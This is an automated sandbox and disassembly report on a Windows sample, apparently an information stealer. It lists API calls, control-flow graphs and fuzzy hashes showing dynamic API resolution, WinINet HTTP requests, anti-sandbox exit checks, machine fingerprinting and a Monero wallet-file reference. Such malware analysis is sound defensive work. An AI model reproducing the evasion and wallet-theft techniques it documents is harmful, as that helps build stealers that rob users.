                        • GetProcAddress.KERNEL32(6F060000,01157248), ref: 0087A5A9
                        • GetProcAddress.KERNEL32(6F060000,011570C8), ref: 0087A5C2
                        • GetProcAddress.KERNEL32(6F060000,01157168), ref: 0087A5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0087A5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0087A607
                        • GetProcAddress.KERNEL32(74E00000,0116D920), ref: 0087A629
                        • GetProcAddress.KERNEL32(74E00000,01169568), ref: 0087A641
                        • GetProcAddress.KERNEL32(74E00000,0116D938), ref: 0087A659
                        • GetProcAddress.KERNEL32(74E00000,0116D698), ref: 0087A672
                        • GetProcAddress.KERNEL32(74DF0000,01156E68), ref: 0087A693
                        • GetProcAddress.KERNEL32(6E680000,0116D800), ref: 0087A6B4
                        • GetProcAddress.KERNEL32(6E680000,01157068), ref: 0087A6CD
                        • GetProcAddress.KERNEL32(6E680000,0116D650), ref: 0087A6E5
                        • GetProcAddress.KERNEL32(6E680000,0116D6E0), ref: 0087A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 86b769aa9320944c2870f4a8d2f3a531f02e7497f87c449bc17f40566337052c
                        • Instruction ID: 526fcb56df2acae6020169079c8171cf4cd00049647df4e7c48753ff37d07a4e
                        • Opcode Fuzzy Hash: 86b769aa9320944c2870f4a8d2f3a531f02e7497f87c449bc17f40566337052c
                        • Instruction Fuzzy Hash: 2F623EB6600212AFC395DFE8ED8896637F9F76E701714851AA609C32F4D7399443CF62
                        Function 00866280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 866280-86630b call 87a7a0 call 8647b0 call 87a740 InternetOpenA StrCmpCA 1040 866314-866318 1033->1040 1041 86630d 1033->1041 1042 86631e-866342 InternetConnectA 1040->1042 1043 866509-866525 call 87a7a0 call 87a800 * 2 1040->1043 1041->1040 1045 8664ff-866503 InternetCloseHandle 1042->1045 1046 866348-86634c 1042->1046 1062 866528-86652d 1043->1062 1045->1043 1048 86634e-866358 1046->1048 1049 86635a 1046->1049 1051 866364-866392 HttpOpenRequestA 1048->1051 1049->1051 1053 8664f5-8664f9 InternetCloseHandle 1051->1053 1054 866398-86639c 1051->1054 1053->1045 1055 8663c5-866405 HttpSendRequestA HttpQueryInfoA 1054->1055 1056 86639e-8663bf InternetSetOptionA 1054->1056 1058 866407-866427 call 87a740 call 87a800 * 2 1055->1058 1059 86642c-86644b call 878940 1055->1059 1056->1055 1058->1062 1067 86644d-866454 1059->1067 1068 8664c9-8664e9 call 87a740 call 87a800 * 2 1059->1068 1071 866456-866480 InternetReadFile 1067->1071 1072 8664c7-8664ef InternetCloseHandle 1067->1072 1068->1062 1076 866482-866489 1071->1076 1077 86648b 1071->1077 1072->1053 1076->1077 1080 86648d-8664c5 call 87a9b0 call 87a8a0 call 87a800 1076->1080 1077->1072 1080->1071
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • InternetOpenA.WININET(00880DFE,00000001,00000000,00000000,00000000), ref: 008662E1
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00866335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0116E750,00000000,00000000,00400100,00000000), ref: 00866385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008663BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008663D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008663FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0086646D
                        • InternetCloseHandle.WININET(00000000), ref: 008664EF
                        • InternetCloseHandle.WININET(00000000), ref: 008664F9
                        • InternetCloseHandle.WININET(00000000), ref: 00866503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 9eb93bc1145ff392641e54898d44825396da895cee8bc6231fb60a198fe8daf9
                        • Instruction ID: 0b07e4fe82c4149397c1bbe5fd74de6f7c681035f955c52e878efd5874138982
                        • Opcode Fuzzy Hash: 9eb93bc1145ff392641e54898d44825396da895cee8bc6231fb60a198fe8daf9
                        • Instruction Fuzzy Hash: A9712F71A00258ABDB14DFE4DC49BEE77B8FB45700F108158F50AAB2D4DBB4AA85CF52
                        Function 00875510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 875510-875577 call 875ad0 call 87a820 * 3 call 87a740 * 4 1106 87557c-875583 1090->1106 1107 8755d7-87564c call 87a740 * 2 call 861590 call 8752c0 call 87a8a0 call 87a800 call 87aad0 StrCmpCA 1106->1107 1108 875585-8755b6 call 87a820 call 87a7a0 call 861590 call 8751f0 1106->1108 1134 875693-8756a9 call 87aad0 StrCmpCA 1107->1134 1138 87564e-87568e call 87a7a0 call 861590 call 8751f0 call 87a8a0 call 87a800 1107->1138 1124 8755bb-8755d2 call 87a8a0 call 87a800 1108->1124 1124->1134 1139 8756af-8756b6 1134->1139 1140 8757dc-875844 call 87a8a0 call 87a820 * 2 call 861670 call 87a800 * 4 call 876560 call 861550 1134->1140 1138->1134 1143 8756bc-8756c3 1139->1143 1144 8757da-87585f call 87aad0 StrCmpCA 1139->1144 1270 875ac3-875ac6 1140->1270 1148 8756c5-875719 call 87a820 call 87a7a0 call 861590 call 8751f0 call 87a8a0 call 87a800 1143->1148 1149 87571e-875793 call 87a740 * 2 call 861590 call 8752c0 call 87a8a0 call 87a800 call 87aad0 StrCmpCA 1143->1149 1163 875865-87586c 1144->1163 1164 875991-8759f9 call 87a8a0 call 87a820 * 2 call 861670 call 87a800 * 4 call 876560 call 861550 1144->1164 1148->1144 1149->1144 1249 875795-8757d5 call 87a7a0 call 861590 call 8751f0 call 87a8a0 call 87a800 1149->1249 1170 875872-875879 1163->1170 1171 87598f-875a14 call 87aad0 StrCmpCA 1163->1171 1164->1270 1179 8758d3-875948 call 87a740 * 2 call 861590 call 8752c0 call 87a8a0 call 87a800 call 87aad0 StrCmpCA 1170->1179 1180 87587b-8758ce call 87a820 call 87a7a0 call 861590 call 8751f0 call 87a8a0 call 87a800 1170->1180 1200 875a16-875a21 Sleep 1171->1200 1201 875a28-875a91 call 87a8a0 call 87a820 * 2 call 861670 call 87a800 * 4 call 876560 call 861550 1171->1201 1179->1171 1275 87594a-87598a call 87a7a0 call 861590 call 8751f0 call 87a8a0 call 87a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1144 1275->1171
                        APIs
                          • Part of subcall function 0087A820: lstrlen.KERNEL32(00864F05,?,?,00864F05,00880DDE), ref: 0087A82B
                          • Part of subcall function 0087A820: lstrcpy.KERNEL32(00880DDE,00000000), ref: 0087A885
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008756A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875857
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875228
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 008752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875318
                          • Part of subcall function 008752C0: lstrlen.KERNEL32(00000000), ref: 0087532F
                          • Part of subcall function 008752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00875364
                          • Part of subcall function 008752C0: lstrlen.KERNEL32(00000000), ref: 00875383
                          • Part of subcall function 008752C0: lstrlen.KERNEL32(00000000), ref: 008753AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0087578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00875A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 245e9172db7da670742e6868e30821cddb0e24592a78cfaad51a79bace6f281b
                        • Instruction ID: 7739cbb6530e9c0057b68bd508391e54e6aa3c3149e9fb1173539c8109494fa0
                        • Opcode Fuzzy Hash: 245e9172db7da670742e6868e30821cddb0e24592a78cfaad51a79bace6f281b
                        • Instruction Fuzzy Hash: E2E122719101089ACB18FBB8DC969ED7378FB94300F50C528B51AD61D9EF74EA0ACB93
                        Function 008717A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 8717a0-8717cd call 87aad0 StrCmpCA 1304 8717d7-8717f1 call 87aad0 1301->1304 1305 8717cf-8717d1 ExitProcess 1301->1305 1309 8717f4-8717f8 1304->1309 1310 8719c2-8719cd call 87a800 1309->1310 1311 8717fe-871811 1309->1311 1312 871817-87181a 1311->1312 1313 87199e-8719bd 1311->1313 1316 871821-871830 call 87a820 1312->1316 1317 8718cf-8718e0 StrCmpCA 1312->1317 1318 87198f-871999 call 87a820 1312->1318 1319 8718ad-8718be StrCmpCA 1312->1319 1320 871849-871858 call 87a820 1312->1320 1321 871835-871844 call 87a820 1312->1321 1322 871913-871924 StrCmpCA 1312->1322 1323 871932-871943 StrCmpCA 1312->1323 1324 8718f1-871902 StrCmpCA 1312->1324 1325 871951-871962 StrCmpCA 1312->1325 1326 871970-871981 StrCmpCA 1312->1326 1327 87187f-871890 StrCmpCA 1312->1327 1328 87185d-87186e StrCmpCA 1312->1328 1313->1309 1316->1313 1333 8718e2-8718e5 1317->1333 1334 8718ec 1317->1334 1318->1313 1331 8718c0-8718c3 1319->1331 1332 8718ca 1319->1332 1320->1313 1321->1313 1337 871926-871929 1322->1337 1338 871930 1322->1338 1339 871945-871948 1323->1339 1340 87194f 1323->1340 1335 871904-871907 1324->1335 1336 87190e 1324->1336 1341 871964-871967 1325->1341 1342 87196e 1325->1342 1344 871983-871986 1326->1344 1345 87198d 1326->1345 1329 871892-87189c 1327->1329 1330 87189e-8718a1 1327->1330 1350 871870-871873 1328->1350 1351 87187a 1328->1351 1352 8718a8 1329->1352 1330->1352 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1341->1342 1342->1313 1344->1345 1345->1313 1350->1351 1351->1313 1352->1313
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 008717C5
                        • ExitProcess.KERNEL32 ref: 008717D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 3c72e6c260c123fe4ccd8e3fb5d3095297ab7f24fd947610908233351acbc01c
                        • Instruction ID: 49e743c9a9ddcd3e1e154cbd919520da2e92b6c287ddc9c76a6432b4bd1262d2
                        • Opcode Fuzzy Hash: 3c72e6c260c123fe4ccd8e3fb5d3095297ab7f24fd947610908233351acbc01c
                        • Instruction Fuzzy Hash: 33517BB4A04209EBCB04DFA8C858BBE7BB5FF54304F10C058E519E7284D735E946CB62
                        Function 00877500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 877500-87754a GetWindowsDirectoryA 1357 877553-8775c7 GetVolumeInformationA call 878d00 * 3 1356->1357 1358 87754c 1356->1358 1365 8775d8-8775df 1357->1365 1358->1357 1366 8775e1-8775fa call 878d00 1365->1366 1367 8775fc-877617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 877619-877626 call 87a740 1367->1369 1370 877628-877658 wsprintfA call 87a740 1367->1370 1377 87767e-87768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00877542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0087760A
                        • wsprintfA.USER32 ref: 00877640
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: d14d603da70f09c4d7d56a9ee11739c2c288979a8ca68db32c7f7671afc1c5b8
                        • Instruction ID: 14c55dac87ec47bc85084cd63e69e885fa8d31d79762dc82b171e337c8242848
                        • Opcode Fuzzy Hash: d14d603da70f09c4d7d56a9ee11739c2c288979a8ca68db32c7f7671afc1c5b8
                        • Instruction Fuzzy Hash: AA41A2B1D04248EBDB10DF98DC45BEEBBB8FF18704F104199F509A7284D778AA44CBA6
                        Function 008769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161190), ref: 008798A1
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161298), ref: 008798BA
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161340), ref: 008798D2
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,011613B8), ref: 008798EA
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,011611D8), ref: 00879903
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01169498), ref: 0087991B
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01157368), ref: 00879933
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01157568), ref: 0087994C
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161118), ref: 00879964
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161130), ref: 0087997C
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,011612B0), ref: 00879995
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161310), ref: 008799AD
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01157588), ref: 008799C5
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161358), ref: 008799DE
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 008611D0: ExitProcess.KERNEL32 ref: 00861211
                          • Part of subcall function 00861160: GetSystemInfo.KERNEL32(?), ref: 0086116A
                          • Part of subcall function 00861160: ExitProcess.KERNEL32 ref: 0086117E
                          • Part of subcall function 00861110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0086112B
                          • Part of subcall function 00861110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00861132
                          • Part of subcall function 00861110: ExitProcess.KERNEL32 ref: 00861143
                          • Part of subcall function 00861220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0086123E
                          • Part of subcall function 00861220: __aulldiv.LIBCMT ref: 00861258
                          • Part of subcall function 00861220: __aulldiv.LIBCMT ref: 00861266
                          • Part of subcall function 00861220: ExitProcess.KERNEL32 ref: 00861294
                          • Part of subcall function 00876770: GetUserDefaultLangID.KERNEL32 ref: 00876774
                          • Part of subcall function 00861190: ExitProcess.KERNEL32 ref: 008611C6
                          • Part of subcall function 00877850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008611B7), ref: 00877880
                          • Part of subcall function 00877850: RtlAllocateHeap.NTDLL(00000000), ref: 00877887
                          • Part of subcall function 00877850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0087789F
                          • Part of subcall function 008778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877910
                          • Part of subcall function 008778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00877917
                          • Part of subcall function 008778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0087792F
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00876AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00876AF9
                        • Sleep.KERNEL32(00001770), ref: 00876B04
                        • CloseHandle.KERNEL32(?,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876B1A
                        • ExitProcess.KERNEL32 ref: 00876B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 23bdd3a3787ba017bd2151963e9c7a1fe521bbba4362868d8a6d95770fcfb282
                        • Instruction ID: f234d9f61eddc4438df1038df43f24cf153462beb52802c16a8b1b8b1879e236
                        • Opcode Fuzzy Hash: 23bdd3a3787ba017bd2151963e9c7a1fe521bbba4362868d8a6d95770fcfb282
                        • Instruction Fuzzy Hash: 993120709002095ADB08F7F4DC56BEEB778FF55340F108524F226E2196EF709905C6A3
                        Function 00861220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
